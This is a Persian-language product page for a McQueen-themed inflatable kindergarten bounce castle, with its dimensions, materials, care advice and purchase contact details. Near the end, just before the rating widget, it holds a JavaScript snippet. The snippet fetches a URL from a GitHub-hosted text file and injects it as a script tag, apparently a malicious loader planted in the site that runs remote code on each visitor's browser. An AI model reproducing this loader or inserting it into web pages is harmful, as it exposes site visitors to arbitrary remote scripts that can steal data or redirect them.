قصر بادی مک کوئین

 • قصر بادی مک کوئین مهد کودکی است. جهت اطلاعات بیشتر در مورد سرسره بادی های مهد کودکی می توانید به پست سرسره بادی مهد کودکی که می توانید از بادی سازان مجد خریداری کنید! مراجعه نمایید. این سرسره بادی از طراحی منحصر به فردی برخوردار است. دیوار های دستگاه به صورت ماشین از نیم روخ طراحی شده. و دارای چاپ های زیبا که باعث می شود کودکان بیشتر حذب این سرسره بشن .

  قصر بادی مک کوئین

  ابعاد سرسره بادی مک کوئین وزن این سرسره 50 کیلوگرم، طول این سرسره 4 متر و عرض آن 3 متر می باشد. همچنین ارتفاع این سرسره 2.5 و ارتفاع سکوی آن 1.5 متر است. بنابرین شما می توانید از این سرسره در محیط های سربسته کوچک مانند مهدکودک ها و شهر بازی های سر پوشیده استفاده نمایید. لوازم جانبی این سرسره بادی نیازمند یک پمپ هوا (دمنده باد) نیم اسب می باشد. همچنین نیازمند اقلام پیشفرض مانند روکش سر و واکس است. نحوه نگهداری و درجه سنی این سرسره مناسب سنین 4 تا 8 سال می باشد که در مهد کودک ها کاربرد بسیار بالایی دارد. همچنین این سرسره بادی به شرایط بد آب و هوایی حساس است بنابرین دوری از رطوبت و گرمای آفتاب می تواند به طول عمر سرسره شما اضافه کند. جنس دوخت و پارچه پارچه این سرسره از با کیفیت ترین پارچه کره ای تهیه شده و دوام بسیار بالایی دارد. همچنین دوخت این سرسره با نخ ترکیه ای توسط اساتید مجرب و با تجربه در این حوزه دوخته شده است. طرح و رنگ طرح این سرسره ثابت بوده و رنگ پارچه آن بر اساس موجودی انبار استفاده می شود. همچنین این سرسره دارای دو سرسره مشابه دیگر با همین ابعاد و طرح متفاوت می باشد. مشاهده سرسره بادی مهد کودکی باب اسفنجی و سرسره بادی مهد کودکی تام و جری.

  نحوه خرید این قصر بادی مک کوئین

  تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید این سرسره ماشین ها به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

  امتیاز شما:

  میانگین امتیازات ۴ از ۵
  از مجموع ۴ رای

  دیدگاهتان را بنویسید